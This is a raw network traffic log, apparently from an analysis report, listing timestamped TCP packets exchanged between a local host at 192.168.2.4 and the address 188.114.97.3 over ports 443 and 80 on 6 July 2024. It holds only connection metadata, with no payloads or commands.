                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.297693014 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.297755957 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.297785044 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.297842026 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.298541069 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.298595905 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.299386024 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.299447060 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.300215006 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.300273895 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.300349951 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.300398111 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.301203012 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.301251888 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.301994085 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:58.302042961 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.366996050 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367043972 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367202997 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367206097 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367218018 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367264986 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367280960 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367285013 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367327929 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367409945 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367444038 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367463112 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367466927 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367481947 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367495060 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367503881 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367506981 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367516994 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367528915 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367558002 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367562056 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367597103 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367896080 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.367954016 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368089914 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368134022 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368149996 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368154049 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368166924 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368179083 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368191957 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368196011 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368206024 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368222952 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368238926 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368252039 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368257046 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368268013 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368282080 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368303061 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368307114 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368345976 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368937016 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368978024 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368995905 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.368999958 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369009972 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369019032 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369031906 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369035006 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369044065 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369065046 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369076967 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369091034 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369095087 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369108915 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369121075 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369138002 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369141102 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369158983 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.369184017 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840363979 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840404034 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840434074 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840435028 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840445042 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840468884 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840472937 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840496063 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840502977 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840512991 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840545893 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840585947 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840635061 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840747118 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840795994 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840810061 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840816021 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840840101 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.840851068 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841490984 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841550112 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841630936 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841707945 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841736078 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.841783047 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.842279911 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.842334986 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.842437983 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.842489958 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.843707085 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.843720913 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.843785048 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.843791008 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.843831062 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844039917 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844082117 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844090939 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844127893 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844192028 CEST49730443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:26:59.844203949 CEST44349730188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.654114008 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.661046982 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.661117077 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.661295891 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:07.668237925 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304615974 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304687023 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304836035 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304869890 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304887056 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304888010 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304903984 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304913998 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304919958 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304934025 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304936886 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304954052 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304960012 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304968119 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304970026 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304984093 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304987907 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.304999113 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.305027008 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.305047989 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309663057 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309695959 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309725046 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309751987 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309814930 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.309859037 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395544052 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395561934 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395579100 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395596027 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395612001 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395617962 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395637035 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395644903 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395693064 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395797014 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395840883 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395873070 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395889044 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395915985 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395931005 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395939112 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395956039 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395971060 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395982981 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.395997047 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396011114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396817923 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396868944 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396871090 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396888018 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396914005 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396933079 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396975040 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.396991968 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397006989 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397022963 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397048950 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397773981 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397825956 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397830009 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397845984 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397876978 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397890091 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397919893 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397936106 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397969961 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.397983074 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486430883 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486504078 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486598015 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486649036 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486649990 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486668110 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486701965 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.486726046 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530008078 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530081987 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530090094 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530131102 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530498028 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530551910 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530567884 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530602932 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530630112 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530709028 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530725956 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530740976 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530781984 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530803919 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530878067 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530903101 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530924082 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530947924 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.530972004 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531006098 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531021118 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531038046 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531054020 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531074047 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531088114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531132936 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531311989 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531366110 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531807899 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531862020 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531874895 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531897068 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531919003 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531939030 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531966925 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531982899 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.531999111 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532011986 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532016993 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532027960 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532047987 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532071114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532227039 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532282114 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532984018 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.532999039 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533020973 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533037901 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533039093 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533061028 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533090115 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533118010 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533133984 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533149958 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533168077 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533174038 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533200026 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.533219099 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.580889940 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.580904961 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.580919981 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.580967903 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.580993891 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.581170082 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.581186056 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.581202030 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.581218958 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.581238985 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682420969 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682452917 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682468891 CEST8049731188.114.97.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682495117 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682526112 CEST4973180192.168.2.4188.114.97.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:08.682526112 CEST4973180192.168.2.4188.114.97.3
